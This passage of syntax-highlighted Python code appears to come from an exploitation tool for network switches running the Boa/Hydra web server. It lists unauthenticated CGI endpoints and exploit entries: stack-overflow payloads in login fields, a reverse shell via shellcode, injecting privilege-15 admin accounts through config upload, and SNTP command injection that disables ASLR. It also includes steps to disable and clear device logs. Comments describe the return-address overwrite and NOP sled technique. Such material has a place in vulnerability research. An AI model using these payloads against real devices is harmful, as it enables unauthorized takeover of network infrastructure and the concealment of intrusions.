						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_4364=Clear+buffered+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'httpuploadbakcfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "backup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadbakcfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">' Invalid config file!!'</span><span class="token punctuation">,</span> <span class="token comment"># one 0x20 in beginning</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Image Signature Error'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'dispatcher.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username=admin&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">184</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;login=1'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadfirmware.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadfirmware.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Image Signature Error'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload_runstart_cfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload_runstart_cfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'version_upgrade.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (Frontend to "httpuploadfirmware.cgi")'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/version_upgrade.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Firm Upgrade'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Firm Upgrade'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'factory_reset.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Reset device to factory default (PoC: Too dangerous to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/factory_reset.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Too dangerous to verify'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'sysinfo_config.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'System basic information configuration (Frontend to "change_mac_addr_set.cgi")'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sysinfo_config.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'dummy'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'"/cgi-bin/change_mac_addr_set'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'change_mac_addr_set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "switch_type/sys_hardver" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/change_mac_addr_set.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'switch_type='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">116</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;sys_hardver=31337&amp;sys_macaddr=DE:AD:BE:EF:13:37&amp;sys_serialnumber=DE:AD:BE:EF:13:37&amp;password=tgnetadmin'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span> 
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=524&amp;usrName=USERNAME'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=1&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'cmd=547'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>

						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>

						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=+&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=0&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;LOGGING_SERVICE=0'</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>						<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>									<span class="token comment"># Clean RAM log CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>							<span class="token comment"># Clean RAM log SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>									<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>							<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">80</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;login=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_Server=+&amp;sntp_Port=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp_enable=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 

					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;login=1'</span><span class="token punctuation">,</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token comment">#'stack':False, # False = use Heap, and there are no ASLR</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Netgear'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'NETGEAR Inc.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
